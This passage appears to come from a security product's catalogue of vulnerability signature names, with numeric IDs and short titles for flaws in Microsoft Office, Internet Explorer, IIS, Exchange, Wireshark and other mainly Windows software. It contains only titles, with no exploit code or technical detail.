code execution [61513] Microsoft Internet Information Services (IIS) URL authentication bypass [61512] Microsoft Internet Information Services request header buffer overflow [61511] Microsoft Internet Information Services repeated POST denial of service [61509] Microsoft Outlook Online Mode buffer overflow [61393] Google Chrome Windows kernel unspecified [61067] Windows Live Messenger animation denial of service [60802] Google Chrome Windows kernel unspecified [60739] Microsoft Internet Explorer frame.frameBorder denial of service [60735] Microsoft .NET Framework CLR code execution [60733] Microsoft Word HTML linked objects code execution [60732] Microsoft Word RTF buffer overflow [60731] Microsoft Word RTF code execution [60730] Microsoft Word record code execution [60727] Microsoft Excel Excel file code execution [60712] Microsoft Internet Explorer uninitialized memory corruption code execution [60711] Microsoft Internet Explorer uninitialized memory corruption code execution [60710] Microsoft Internet Explorer race condition memory corruption code execution [60709] Microsoft Internet Explorer uninitialized memory corruption code execution [60708] Microsoft Internet Explorer uninitialized memory corruption code execution [60707] Microsoft Internet Explorer mouse information disclosure [60561] Microsoft Exchange Server Outlook Web Access cross-site request forgery [60522] Microsoft Clip Organizer ActiveX control denial of service [60478] A file containing Microsoft LNK data was detected [60290] HP Insight Orchestration for Windows unauthorized access [60289] HP Virtual Connect Enterprise Manager for Windows unspecified cross-site scripting [60288] HP Insight Control Server Migration for Windows unspecified cross-site request forgery [60287] HP Insight Control Server Migration for Windows unauthorized access [60286] HP Insight Control Power Management for Windows unauthorized access [60164] Microsoft Exchange Server OWA cross-site request forgery [60156] Microsoft Word Word file code execution [59948] Microsoft Internet Explorer mshtml.dll information disclosure [59894] Microsoft Outlook SMB code execution [59889] Microsoft Office ActiveX control code execution [59768] Microsoft Internet Explorer IFRAME information disclosure [59088] Microsoft Internet Explorer nntp:// URIs denial of service [59087] Microsoft Internet Explorer news:// URIs denial of service [59069] Microsoft Internet Explorer CSS expression denial of service [59060] Microsoft ASP.NET view state cross-site scripting [59057] Microsoft ASP.NET EnableViewStateMac cross-site scripting [59055] Microsoft ASP.NET InnerHtml property cross-site scripting [58954] Microsoft Dynamics GP password security bypass [58912] Microsoft Excel Office XML privilege escalation [58911] Microsoft Excel ADO code execution [58910] Microsoft Excel string code execution [58909] Microsoft Excel stack code execution [58908] Microsoft Excel EDG code execution [58907] Microsoft Excel Excel code execution [58906] Microsoft Excel HFPicture code execution [58905] Microsoft Excel Excel file code execution [58904] Microsoft Excel RTD code execution [58903] Microsoft Excel Excel code execution [58902] Microsoft Excel format code execution [58901] Microsoft Excel chart sheet substreams code execution [58900] Microsoft Excel object buffer overflow [58899] Microsoft Excel record code execution [58890] Microsoft SharePoint help page denial of service [58870] Microsoft Internet Explorer deleted object code execution [58869] Microsoft Internet Explorer IE8 Developer Toolbar code execution [58868] Microsoft Internet Explorer HTML element code execution [58867] Microsoft Internet Explorer object code execution [58866] Microsoft Internet Explorer toStaticHTML information disclosure [58864] Microsoft Internet Information Services (IIS) authentication code execution [58862] Microsoft Office COM code execution [58835] Microsoft Outlook Web Access (OWA) id cross-site scripting [58833] Microsoft Dynamics GP cipher information disclosure [58757] Microsoft Internet Explorer IFRAME element denial of service [58506] HP Insight Control server migration for Windows cross-site scripting [58496] Microsoft Internet Explorer Invisible Hand extension information disclosure [58346] Microsoft Visio DXF buffer overflow [58170] Microsoft Visual Basic for Applications (VBA) ActiveX control buffer overflow [58044] Microsoft Internet Explorer filter cross-site scripting [57990] Microsoft Internet Explorer XML unspecified [57978] Microsoft wireless keyboard XOR weak security [57783] DWG Windows FTP Server security bypass [57581] Microsoft Office Communicator SIP INVITE denial of service [57401] Microsoft Internet Explorer data structures denial of service [57387] Apple iTunes for Windows installation privilege escalation [57373] Microsoft MPEG Layer-3 buffer overflow [57340] Microsoft Visio index code execution [57339] Microsoft Visio attributes code execution [57338] Microsoft Internet Explorer 8 Developer Tools code execution [57327] Microsoft Office PublisherTextBox buffer overflow [57307] Microsoft Internet Explorer deleted object code execution [57306] Microsoft Internet Explorer URL code execution [57305] Microsoft Internet Explorer domain information disclosure [57304] Microsoft Internet Explorer HTML object code execution [57303] Microsoft Internet Explorer HTML object code execution [57302] Microsoft Internet Explorer deleted object code execution [57301] Microsoft Internet Explorer object code execution [57300] Microsoft Internet Explorer strings information disclosure [57299] Microsoft Internet Explorer object code execution [57197] Microsoft Internet Explorer unspecified code execution [57196] Microsoft Internet Explorer base address buffer overflow [56994] Microsoft Virtual PC and Microsoft Virtual Server Virtual Machine Monitor security bypass [56856] Skype for Windows skypePM.exe file deletion [56809] Skype for Windows URI handler information disclosure [56808] Microsoft Office AccWizObjects code execution [56772] Microsoft Internet Explorer use-after-free code execution [56651] Microsoft Internet Information Services DNS cross-site scripting [56597] Microsoft Sharepoint Upload.aspx cross-site scripting [56469] Microsoft Excel DbOrParamQry code execution [56468] Microsoft Excel XLSX code execution [56467] Microsoft Excel FNGROUPNAME code execution [56466] Microsoft Excel MDXSET buffer overflow [56465] Microsoft Excel MDXTUPLE buffer overflow [56464] Microsoft Excel object type code execution [56463] Microsoft Excel record memory code execution [56460] Microsoft Movie Maker and and Microsoft Producer buffer overflow [56431] Microsoft Internet Explorer CSS stylesheets information disclosure [56241] OpenOffice.org Microsoft Word file sprmTSetBrc buffer overflow [56240] OpenOffice.org Microsoft Word file sprmTDefTable buffer overflow [56093] Microsoft Internet Explorer URLMON security bypass [55931] Microsoft Office Office files buffer overflow [55929] Microsoft DirectShow AVI file buffer overflow [55927] Microsoft Paint JPEG integer overflow [55915] Microsoft Data Analyzer ActiveX Control code execution [55900] Microsoft Internet Explorer createElement denial of service [55889] Microsoft PowerPoint ViewerTextCharsAtom buffer overflow [55888] Microsoft PowerPoint Viewer TextBytesAtom buffer overflow [55887] Microsoft PowerPoint OEPlaceholderAtom code execution [55886] Microsoft PowerPoint placementId code execution [55885] Microsoft PowerPoint LinkedSlideAtom buffer overflow [55884] Microsoft PowerPoint file path buffer overflow [55863] Microsoft Internet Explorer multiple unspecified denial of service [55817] Windows Live Messenger ActiveX Control buffer overflow [55778] Microsoft Internet Explorer object memory code execution [55777] Microsoft Internet Explorer uninitialized code execution [55776] Microsoft Internet Explorer deleted object code execution [55775] Microsoft Internet Explorer initialized memory code execution [55774] Microsoft Internet Explorer deleted object code execution [55773] Microsoft Internet Explorer URL code execution [55676] Microsoft Internet Explorer ActiveX Control code execution [55642] Microsoft Internet Explorer freed object code execution [55483] Windows Live Messenger ActiveX control ViewProfile() denial of service [55308] Microsoft Internet Information Services colon security bypass [55154] Microsoft Silverlight code execution [55031] Microsoft Internet Information Services (IIS) filenames security bypass [54935] Wireshark Windows IPMI dissector denial of service [54463] Microsoft Internet Explorer cross-site scripting filter information disclosure [54444] Microsoft WordPad and Office Text Converter Word 97 file code execution [54423] Microsoft Office Project project code execution [54421] Microsoft Internet Explorer deleted object code execution [54420] Microsoft Internet Explorer uninitialized object code execution [54418] Microsoft Internet Explorer uninitialized object code execution [54399] Microsoft Internet Explorer PDF information disclosure [54367] Microsoft Internet Explorer CSS/Style code execution [54317] Microsoft Internet Explorer setHomePage denial of service [54234] Sun Java SE Windows Pluggable Look and Feel unspecified [54011] Microsoft Excel field code execution [54010] Microsoft Excel Excel records code execution [54009] Microsoft Excel Excel formulas code execution [54008] Microsoft Excel cell code execution [54007] Microsoft Excel BIFF records buffer overflow [54006] Microsoft Excel Featheader code execution [54005] Microsoft Excel SxView code execution [54004] Microsoft Excel cache code execution [53976] Microsoft Word Word file code execution [53955] Microsoft SharePoint download feature information disclosure [53937] Sun Solaris XScreenSaver popup windows information disclosure [53601] Microsoft Office 2008 for Mac user ID 502 security bypass [53543] Microsoft Internet Explorer uninitialized object code execution [53542] Microsoft Internet Explorer uninitialized code execution [53539] Microsoft Internet Explorer arguments code execution [53538] Microsoft Internet Explorer data stream headers code execution [53532] Microsoft Office BMP image code execution [53520] Microsoft Server Message Block (SMB) Protocol software command value code execution [53519] Microsoft Server Message Block (SMB) Protocol software denial of service [53417] Microsoft Internet KEYGEN denial of service [53414] Microsoft Internet window.print denial of service [53034] Microsoft Internet Information Services (IIS) directory listings denial of service [53005] Microsoft Internet Explorer window.open() spoofing [52926] Sophos PureMessage for Microsoft Exchange anti-virus and anti-spam unspecified vulnerability [52925] Sophos PureMessage for Microsoft Exchange EdgeTransport.exe denial of service [52915] Microsoft Internet Information Services (IIS) FTP buffer overflow [52897] Microsoft Internet Explorer JavaScript code denial of service [52889] Windows File Parameter Alteration [52870] Microsoft Internet Explorer integer value denial of service [52780] Microsoft .NET Framework CLR code execution [52765] Microsoft Internet Explorer XML denial of service [52762] Microsoft Internet Explorer Unicode string denial of service [52722] Microsoft Internet Explorer DIV element denial of service [52590] Microsoft Internet Explorer JavaScript SetAttribute denial of service [52276] Solaris XScreenSaver Xorg popup windows information disclosure [52273] Windows Security Support Provider Interface credential forwarding [52249] Microsoft Internet Explorer mshtml.dll denial of service [52243] Microsoft IIS With .NET Path Disclosure [52241] Microsoft IIS servervariables_vbscript.asp Information Disclosure [52240] Microsoft IIS Sample Application Physical Path Disclosure [52238] Microsoft FrontPage Server Extensions Vital Information Leakage [52237] Microsoft FrontPage Server Extensions To Do List Found [52236] Microsoft FrontPage Server Extensions Machine Name Disclosure [52235] Microsoft FrontPage Configuration Information Leakage [52234] Microsoft FrontPage '_vti_cnf' Information Leakage [52233] Microsoft IIS With .NET Path Disclosure [52106] Microsoft Message Queuing Service (MSMQ) IOCTL privilege escalation [52105] Microsoft Office Web Components ActiveX control buffer overflow [52087] Microsoft Active Template Library (ATL) variant code execution [52052] Microsoft Internet Explorer Active Template Library (ATL) ActiveX control killbit security bypass [52051] Microsoft Internet Explorer deleted objects code execution [52050] Microsoft Internet Explorer table operations code execution [52049] Microsoft Internet Explorer memory object code execution [52048] Microsoft Active Template Library (ATL) NULL string information disclosure [52047] Microsoft Active Template Library (ATL) object code execution [52044] Microsoft Active Template Library (ATL) header code execution [51972] Windows Live Messenger Marcelo Costa FileServer directory traversal [51637] Microsoft Internet Explorer AddFavorite buffer overflow [51616] Microsoft Internet Explorer cached certificate weak security [51552] Microsoft Internet Explorer Refresh header cross-site scripting [51467] Microsoft ISA Server Radius One Time Password (OTP) privilege escalation [51464] Microsoft Virtual PC and Microsoft Virtual Server privilege escalation [51461] Microsoft DirectX DirectShow code execution [51460] Microsoft Publisher pointer dereference code execution [51458] Microsoft DirectX QuickTime code execution [51454] Microsoft Office Web Components ActiveX control buffer overflow [51452] Microsoft Office Web Components ActiveX control HTML code execution [51451] Microsoft Office Web Components ActiveX control code execution [51378] Microsoft Internet Explorer connect response weak security [51186] Microsoft Internet Explorer https security bypass [50849] ATEN KH1516i and KN9116 IP KVM switch Windows and Java client RSA cryptography weak security [50831] Microsoft DirectX quartz.dll code execution [50794] Microsoft Word Word file buffer overflow [50793] Microsoft Word Word file buffer overflow [50790] Microsoft Excel record pointer code execution [50789] Microsoft Excel record integer overflow [50788] Microsoft Excel field code execution [50787] Microsoft Excel string buffer overflow [50786] Microsoft Excel array indexing code execution [50785] Microsoft Excel object record code execution [50784] Microsoft Excel pointer code execution [50775] Microsoft Internet Explorer HTML objects code execution [50774] Microsoft Internet Explorer HTML objects code execution [50773] Microsoft Internet Explorer HTML objects code execution [50772] Microsoft Internet Explorer object access code execution [50771] Microsoft Internet Explorer HTML code execution [50770] Microsoft Internet Explorer DHTML code execution [50769] Microsoft Internet Explorer cached data cross-domain security bypass [50764] Microsoft Print Spooler service information disclosure [50756] Microsoft Office Converter buffer overflow [50633] HP System Management Homepage (SMH) for Linux and Windows unspecified cross-site scripting [50573] Microsoft Internet Information Services (IIS) WebDAV security bypass [50553] Dream Windows MaxCMS inc/ajax.asp SQL injection [50529] Apple Mac OS X Microsoft Office Spotlight Importer code execution variant 1 [50494] Microsoft Internet Explorer utf-7 encoded characters cross-site scripting [50425] Microsoft PowerPoint sound data code execution [50354] McAfee GroupShield for Microsoft Exchange X- headers security bypass [50350] Microsoft Internet Explorer unprintable characters denial of service [50280] Microsoft PowerPoint atoms or data buffer overflow [50279] Microsoft PowerPoint notes buffer overflow [50278] Microsoft PowerPoint sound data buffer overflow [50277] Microsoft PowerPoint name strings buffer overflow [50276] Microsoft PowerPoint structures buffer overflow [50275] Microsoft PowerPoint string buffer overflow [50274] Microsoft PowerPoint sound PowerPoint 95 code execution [50273] Microsoft PowerPoint BuildList record code execution [50272] Microsoft PowerPoint sound data code execution [50271] Microsoft PowerPoint sound code execution [50270] Microsoft PowerPoint record types integer overflow [50269] Microsoft PowerPoint record header buffer overflow [49888] Microsoft Intelligent Application Gateway Whale Client Components ActiveX control buffer overflow [49632] Microsoft PowerPoint index value code execution [49575] Microsoft Wordpad Word 97 buffer overflow [49573] Microsoft Office WordPerfect 6.x Converter code execution [49572] Microsoft WordPad and Office Text Converter file code execution [49567] Microsoft ISA Server and Microsoft Forefront TMG cookieauth.dll cross-site scripting [49564] Microsoft ISAServer and Microsoft Forefront TMG Web proxy TCP state denial of service [49559] Microsoft DirectShow MJPEG code execution [49557] Microsoft Internet Explorer uninitialized memory code execution [49555] Microsoft Internet Explorer deleted memory code execution [49554] Microsoft Internet Explorer uninitialized memory code execution [49552] Microsoft Internet Explorer page transition code execution [49549] Microsoft Internet Explorer WinINet code execution [49544] Microsoft Excel object code execution [49389] Microsoft Internet Explorer unspecified code execution [49176] IBM Tivoli Storage Manager HSM for Windows client buffer overflow [49109] OpenBSD and Microsoft Interix fts_build function denial of service [48875] Microsoft Excel unspecified code execution [48815] Microsoft XML Core Services HTTPOnly Set-Cookie2 HTTP response headers information disclosure [48810] Windows Live Messenger Charset denial of service [48595] Microsoft Word 2007 Email as PDF information disclosure [48576] TFTP Windows PUT request detected [48542] Microsoft Internet Explorer onclick action click hijacking [48528] IBM WebSphere Application Server JSP Windows information disclosure [48337] WOW - Web On Windows ActiveX Control WriteIniFileString code execution [48335] Microsoft Internet Explorer HTML form value denial of service [48310] Microsoft Internet Explorer Cascading Style Sheets code execution [48309] Microsoft Internet Explorer CFunctionPointer code execution [48305] Microsoft Visio memory code execution [48303] Microsoft Visio object data copy code execution [48296] Microsoft Visio object data validation code execution [48294] Microsoft .NET Framework Type check code execution [48293] Microsoft .NET Framework CAS verification code execution [48023] Windows NTP Time Server Syslog Monitor syslog message denial of service [47974] Oracle Database SQLPlus Windows GUI component local information disclosure [47973] Oracle Database SQLPlus Windows GUI component remote information disclosure [47868] Microsoft HTML Help Workshop .hhp buffer overflow [47818] Windows Live Messenger Now Playing Plugin (gen_msn) plugin for Winamp gen_msn.dll buffer overflow [47788] Microsoft Internet Explorer JavaScript onload=screen attribute denial of service [47774] Microsoft Internet Explorer Scripting.FileSystem security bypass [47756] Microsoft Money prtstb06.dll ActiveX control denial of service [47738] Microsoft MSN Messenger IP address information disclosure [47671] Microsoft Exchange Server EMSMDB2 invalid MAPI commands denial of service [47670] Microsoft Exchange Server TNEF decoding code execution [47444] Microsoft Internet Explorer XDomainRequestAllowed header XSS filter bypass [47443] Microsoft Internet Explorer Location and Set-Cookie HTTP header XSS filter bypass [47442] Microsoft Internet Explorer X-XSS-Protection HTTP header XSS filter bypass [47441] Microsoft Internet Explorer Content-Type header XSS filter bypass [47277] Microsoft Internet Explorer CSS expression property XSS filter bypass [47258] Sun Ray Server Software and Sun Ray Windows Connector LDAP security bypass [47246] Microsoft Wordpad Text Converter for Word 97 buffer overflow [47208] Microsoft Internet Explorer data binding code execution [47182] Microsoft SQL Server sp_replwritetovarbin() buffer overflow [46878] Microsoft Excel file record code execution [46863] Microsoft Excel NAME record code execution [46862] Microsoft Excel spreadsheet formula code execution [46860] Microsoft Internet Explorer embedded object code execution [46859] Microsoft Internet Explorer deleted object code execution [46858] Microsoft Internet Explorer HTML objects uninitialized memory code execution [46857] Microsoft Internet Explorer parameter validation code execution [46854] Microsoft Office SharePoint access control privilege escalation [46852] Microsoft Word document table property buffer overflow [46851] Microsoft Word RTF stylesheet control word buffer overflow [46850] Microsoft Word RTF group control word buffer overflow [46849] Microsoft Word RTF drawing object buffer overflow [46848] Microsoft Word RTF drawing object code execution [46847] Microsoft Word malformed value code execution [46846] Microsoft Word RTF polyline and polygon buffer overflow [46731] Symantec Backup Exec for Windows Servers data management protocol buffer overflow [46730] Symantec Backup Exec for Windows Servers Backup Exec Remote Agent security bypass [46695] Microsoft .NET Framework SN weak security [46673] Microsoft Communicator SIP INVITE message unspecified denial of service [46671] Microsoft Communicator emoticon unspecified denial of service [46628] Microsoft Active Directory username information disclosure [46590] Microsoft Sharepoint HTML document cross-site scripting [46309] Microsoft Debug Diagnostic Tool DebugDiag ActiveX control denial of service [46235] Microsoft Internet Explorer high-bit address bar spoofing [46234] Microsoft Internet Explorer non-breaking space address bar spoofing [46189] Microsoft Visual Basic Charts ActiveX control code execution [46187] Microsoft Visual Basic Hierarchical Flexgrid ActiveX control code execution [46183] Microsoft Visual Basic Flexgrid ActiveX control code execution [46178] Microsoft Visual Basic Datagrid ActiveX control code execution [46061] Microsoft Outlook Web Access (OWA) redir.asp phishing [45854] Microsoft Internet Explorer script origin information disclosure [45746] Cisco Unity Microsoft API unspecified denial of service [45735] Microsoft PicturePusher ActiveX control file upload [45718] Microsoft Internet Explorer Extended HTML Form cross-site scripting [45656] XAMPP for Windows cds.php and phonebook.php SQL injection [45639] Microsoft Internet Explorer alert function denial of service [45584] Microsoft IIS adsiis.dll ActiveX control denial of service [45580] Microsoft Excel REPT code execution [45579] Microsoft Excel spreadsheet BIFF file format buffer overflow [45566] Microsoft Excel calendar object code execution [45564] Microsoft Internet Explorer uninitialized memory code execution [45563] Microsoft Internet Explorer componentFromPoint() code execution [45562] Microsoft Internet Explorer event handling cross-domain security bypass [45558] Microsoft Internet Explorer HTML cross-domain security bypass [45556] Microsoft IAS Helper COM ActiveX control denial of service [45555] Microsoft XML Core Services chunked transfer-encoding headers information disclosure [45554] Microsoft XML Core Services DTD information disclosure [45546] Microsoft Office Content-Disposition cdo:// protocol cross-site scripting [45537] Microsoft Message Queuing RPC code execution [45522] XAMPP for Windows adodb.php cross-site scripting [45507] Citrix Presentation Server for Windows unspecified privilege escalation [45420] Microsoft WordPad .doc denial of service [45225] Microsoft Internet Explorer PNG file denial of service [45214] Microsoft Visio installed [45211] Microsoft Project installed [45208] Microsoft Office installed [45207] Microsoft Internet Explorer installed [45186] Microsoft SQL Server 2000 SQLVDIRLib.SQLVDirControl ActiveX control buffer overflow [45007] Apple Bonjour for Windows mDNSResponder spoofing [45005] Apple Bonjour for Windows mDNSResponder denial of service [44993] Microsoft Organization Chart code execution [44775] PureMessage for Microsoft Exchange PMScanner.exe denial of service [44743] Microsoft ASP.NET ValidateRequest &quot [44741] Microsoft ASP.NET ValidateRequest &quot [44707] Microsoft Office OneNote file Uniform Resource Locator code execution [44704] Microsoft Host Integration Server SNA RPC code execution [44629] Windows Media Services ActiveX control (nskey.dll) CallHTMLHelp() method buffer overflow [44466] Symantec VERITAS Storage Foundation for Windows VxSchedService.exe code execution [44444] Microsoft Visual Studio Masked Edit ActiveX control buffer overflow [44098] Microsoft Internet Explorer print preview argument code execution [44097] Microsoft Internet Explorer table layout code execution [44096] Microsoft Internet Explorer XHTML object code execution [44095] Microsoft Internet Explorer object access code execution [44094] Microsoft Internet Explorer uninitialized memory code execution [44093] Microsoft Internet Explorer uninitialized memory code execution [44091] Microsoft Excel COUNTRY record value code execution [44090] Microsoft Excel FORMAT array index code execution [44089] Microsoft Excel chart AxesSet array index code execution [44088] Microsoft Excel credential caching unauthorized data access [44084] Microsoft Image Color Management InternalOpenColorProfile() buffer overflow [44078] Microsoft Event System index range code execution [44077] Microsoft Event System user subscriptions code execution [44069] Microsoft PowerPoint Viewer picture array index memory calculation code execution [44066] Microsoft PowerPoint Viewer CString object integer overflow [43950] Microsoft Internet Explorer cookie dot session hijacking [43869] F-PROT Antivirus Microsoft Office file denial of service [43676] Microsoft Internet Explorer frame String security bypass [43663] Microsoft Word record parsing code execution [43627] Microsoft Crypto API Certificate Revocation List (CRL) information disclosure [43613] Microsoft Snapshot Viewer ActiveX control code execution [43467] Microsoft Internet Explorer frame Object security bypass [43460] Novell Client for Windows NWFS.SYS privilege escalation [43413] Avaya Messaging Storage Server Windows domain parameters command execution [43366] Microsoft Internet Explorer location and location.href security bypass [43354] Microsoft Office WPG image filter buffer overflow [43353] Microsoft Office BMP image filter buffer overflow [43352] Microsoft Office PICT bits_per_pixel buffer overflow [43329] Microsoft Exchange Outlook Web Access HTML cross-site scripting [43328] Microsoft Exchange Outlook Web Access email fields cross-site scripting [43180] Microsoft Visual Basic Enterprise Edition vb6stkit.dll buffer overflow [43155] Microsoft Word unordered list code execution [43062] VMware COM API for Windows ActiveX control (VmCOM.dll) GuestInfo() method buffer overflow [42899] Microsoft IIS HTTP request smuggling [42804] Microsoft Internet Explorer setRequestHeader chunk security bypass [42692] Microsoft Internet Explorer substringData() buffer overflow [42690] Microsoft PowerPoint list parsing code execution [42683] Microsoft WINS network packet source privilege escalation [42679] Microsoft Outlook Express MHTML information disclosure [42526] Stunnel Windows privilege escalation [42416] Microsoft Internet Explorer &quot [42359] Novell Client for Windows username buffer overflow [42338] Microsoft Internet Explorer res:// URI info disclosure [42307] Microsoft Internet Explorer DisableCachingOfSSLPages weak security [42301] Microsoft OWA (Outlook Web Access) no-store information disclosure [42232] Microsoft Internet Explorer ActiveX string concatenation denial of service [42108] Microsoft Malware Protection Engine data structure denial of service [42107] Microsoft Malware Protection Engine file denial of service [42102] Microsoft Publisher object handler code execution [42100] Microsoft Word malformed CSS code execution [42099] Microsoft Word .rtf string code execution [41940] Microsoft HeartbeatCtl ActiveX control buffer overflow [41934] Microsoft SharePoint Services Picture Source cross-site scripting [41876] Microsoft Works ActiveX control (WkImgSrv.dll) code execution [41826] Microsoft Visual InterDev .SLN file Project line buffer overflow [41476] Microsoft Internet Explorer data stream code execution [41464] Microsoft Internet Explorer hxvz.dll object code execution [41462] Microsoft SQL Server memory INSERT statement buffer overflow [41461] Microsoft SQL Server stored backup file data structure buffer overflow [41460] Microsoft SQL Server convert() buffer overflow [41459] Microsoft SQL Server memory page reuse information disclosure [41452] Microsoft Visio file memory allocation code execution [41451] Microsoft Visio object header code execution [41447] Microsoft Project file memory allocation code execution [41411] Microsoft Internet Explorer setRequestHeader security bypass [41395] Apple Safari for Windows address bar spoofing [41388] Apple Safari for Windows .ZIP file code execution [41380] Microsoft Jet Database Engine Word file buffer overflow [41338] Microsoft Internet Explorer CreateTextRange method denial of service [41223] Novell GroupWise Windows client API security bypass [41156] Cisco Secure Access Control Server (ACS) for Windows User-Changeable Password (UCP) utility CSuserCGI.exe cross-site scripting [41154] Cisco Secure Access Control Server (ACS) for Windows User-Changeable Password (UCP) utility CSuserCGI.exe buffer overflow [41147] Microsoft Internet Explorer FTP command execution [41102] Citrix Presentation Server Client for Windows credential information disclosure [41070] Acronis True Image Echo Group Server Acronis True Image Windows Agent component denial of service [41057] Microsoft Internet Explorer Java and XML information disclosure [40932] Symantec Backup Exec for Windows Server Calendar ActiveX control file overwrite [40926] Symantec Backup Exec for Windows Server Calendar ActiveX control buffer overflow [40888] Microsoft Office file allocation error code execution [40887] Microsoft Office Excel file cell parsing code execution [40884] Microsoft Outlook mailto URI code execution [40878] Microsoft Excel conditioning formatting code execution [40877] Microsoft Excel rich text code execution [40876] Microsoft Excel formula calcuation code execution [40875] Microsoft Excel Style record data code execution [40874] Microsoft Excel .slk file import code execution [40873] Microsoft Excel data validation code execution [40735] Microsoft Internet Explorer danim.dll and lmrt.dll unspecified [40579] Microsoft Active Directory unspecified denial of service [40577] Microsoft Internet Explorer files denial of service [40467] Apple Mac OS X Windows File Sharing unspecified vulnerability [40400] Microsoft DirectSpeechSynthesis Module ActiveX control buffer overflow [40319] Microsoft Internet Explorer certificate spoofing [40316] Microsoft Works Converter section header index table information code execution [40314] Microsoft Publisher .pub invalid memory index code execution [40302] Microsoft MN-500 wireless base station configuration file information disclosure [40286] Microsoft Internet Explorer src attribute denial of service [40283] Microsoft Internet Explorer style attribute denial of service [40120] Skype for Windows SkypeFind cross-zone code execution [40100] Microsoft Word malformed string code execution [40096] Microsoft Works Converter field length information code execution [40095] Microsoft Works Converter section length header code execution [40092] Microsoft Publisher .pub invalid memory reference code execution [40090] Microsoft Internet Explorer argument data handling code execution [40089] Microsoft Internet Explorer property method code execution [40088] Microsoft Internet Explorer HTML layout positioning combination code execution [40087] Microsoft Internet Explorer multiple ActiveX control denial of service [40066] Microsoft Word object code execution [39975] Microsoft Class Package Export Tool clspack.exe buffer overflow [39773] Microsoft Visual Basic Enterprise Edition .dsr file buffer overflow [39755] Microsoft Visual InterDev .SLN buffer overflow [39754] Skype for Windows cross-zone code execution [39699] Microsoft Excel macro handling code execution [39576] Novell Client for Windows nicm.sys privilege escalation [39558] Microsoft FoxServer ActiveX control command execution [39557] Microsoft Rich Textbox ActiveX control file overwrite [39235] Microsoft IIS root folders file change notification privilege escalation [39230] Microsoft IIS HTML encoded ASP code execution [39209] Microsoft Word wordart denial of service [39208] Microsoft Office Publisher multiple denial of service [39158] Apache HTTP Server Windows SMB shares information disclosure [39113] Apple Mac OS X Microsoft Office Spotlight Importer code execution [39021] Microsoft Office XML document weak security [38908] Skype for Windows skype4com URI Handler buffer overflow [38883] Microsoft Optical Desktop information disclosure [38826] Microsoft Internet Explorer WPAD information disclosure [38722] Microsoft DirectX DirectShow WAV and AVI code execution [38721] Microsoft DirectX DirectShow SAMI code execution [38716] Microsoft Internet Explorer DHTML object code execution [38715] Microsoft Internet Explorer element tag code execution [38714] Microsoft Internet Explorer cloneNode and nodeValue code execution [38713] Microsoft Internet Explorer ActiveX setExpression code execution [38697] Wireshark SSCOP dissector denial of service vulnerable Windows version detected [38696] Wireshark DHCP dissector denial of service vulnerable Windows version detected [38695] Wireshark IPsec ESP preference parser off-by-one vulnerable Windows version detected [38694] Wireshark SCSI dissector denial of service vulnerable Windows version detected [38693] Wireshark NFS dissector buffer overflow vulnerable Windows version detected [38691] Wireshark SSH dissector denial of service vulnerable Windows version detected [38690] Wireshark Checkpoint FW-1 dissector format string vulnerable Windows version detected [38677] Symantec Backup Exec for Windows Server bengine.exe denial of service [38676] Symantec Backup Exec for Windows Server bengine.exe NULL pointer dereference denial of service [38499] Microsoft Jet Database Engine MDB file buffer overflow [38440] Microsoft Forms ActiveX control denial of service [38434] Novell Client for Windows NWFILTER.SYS privilege escalation [38432] Microsoft SAFRCFileDlg.RASetting ActiveX control buffer overflow [38431] Windows Live Messenger connection detected [38430] Microsoft Office Web Component OWC11.DataSourceControl ActiveX denial of service [38336] Microsoft Internet Explorer DNS same-origin policy security bypass [38324] Microsoft Outlook and Outlook Express URI handling command execution [38292] Microsoft Sysinternals DebugView privilege escalation [37261] Microsoft Internet Explorer .exe file download warning bypass [37236] Microsoft SQL Slammer patch not installed [37230] Microsoft SQL Server MS00-092 patch not installed [37229] Microsoft SQL Server MS02-043 patch not installed [37228] Microsoft SQL Server MS02-034 patch not installed [37223] Microsoft ActiveSync weak XOR encryption [37200] Microsoft SQL Server 2000 Service Pack 1 update is not installed [37198] Microsoft SQL Server 2000 Service Pack 3 update is not installed [37044] Microsoft Expression Media password information disclosure [37035] Microsoft Visual FoxPro FPOLE.OCX ActiveX FoxDoCmd command execution [36982] Windows Live Messenger shared image files buffer overflow [36981] Symantec Veritas Backup Exec client for Windows Servers unspecified [36953] Microsoft DirectX Media SDK traffic detected [36848] Microsoft Internet Explorer OnKeyDown information disclosure [36818] Microsoft Internet Explorer address bar spoofing [36817] Microsoft Internet Explorer script error code execution [36801] Microsoft Word document workspace code execution [36715] Microsoft Internet Security and Acceleration (ISA) Server SOCKS4 information disclosure [36572] Microsoft Visual Studio PDWizard ActiveX control code execution [36571] Microsoft Visual Studio VB To VSI Support Library ActiveX control file overwrite [36562] Microsoft Visual Basic .VBP file buffer overflow [36554] Wireshark NTP dissector format string vulnerable Windows version detected [36553] Wireshark NCP NMAS and NDPS dissector off-by-one vulnerable Windows version detected [36552] Wireshark MOUNT dissector denial of service vulnerable Windows version detected [36550] Wireshark XML dissector format string vulnerable Windows version detected [36549] Wireshark MQ dissector format string vulnerable Windows version detected [36547] Wireshark ANSI MAP dissector format string vulnerable Windows version detected [36546] Wireshark GSM BSSMAP dissector denial of service vulnerable Windows version detected [36537] Microsoft MSN Messenger video request detected [36509] Microsoft SQL Server sqldmo.dll ActiveX buffer overflow [36496] Microsoft Visual FoxPro FPOLE.OCX ActiveX control buffer overflow [36494] Microsoft Internet Explorer saved pages cross-site scripting [36455] HTML Microsoft Agent ActiveX detected [36351] Microsoft Internet Explorer with SeaMonkey command execution [36314] Microsoft MSN Messenger video conversations buffer overflow [36302] XAMPP for Windows unspecified privilege escalation [36128] Microsoft Internet Explorer position:relative HTML style code denial of service [36073] Apple Safari for Windows download weak security [36032] Cisco VPN Client for Windows cvpnd.exe privilege escalation [36029] Cisco VPN Client for Windows Dial-up Networking Interface privilege escalation [36027] Microsoft Internet Explorer ActiveX popup blocker denial of service [36003] Microsoft Internet Explorer Netscape command execution [35974] Microsoft Internet Explorer FTP username and password information disclosure [35970] Microsoft DirectX Media SDK DXSurface.LivePicture.FLashPix.1 (DXTLIPI.DLL) ActiveX control buffer overflow [35855] Microsoft Register Server DLL file denial of service [35815] Microsoft Excel index value attributes code execution [35764] Microsoft Message Queuing Service buffer overflow [35759] Microsoft Internet Explorer pdwizard.ocx code execution [35755] Microsoft Internet Explorer tblinf32.dll code execution [35752] Microsoft Agent ActiveX control buffer overflow [35749] Microsoft Internet Explorer CSS string code execution [35579] Sun Java System Application Server Windows source disclosure [35492] Microsoft DirectX Targa buffer overflow [35455] Microsoft Internet Explorer Zone domain name denial of service [35421] Microsoft Internet Explorer document.open address bar spoofing [35346] Microsoft Internet Explorer FirefoxURL command execution 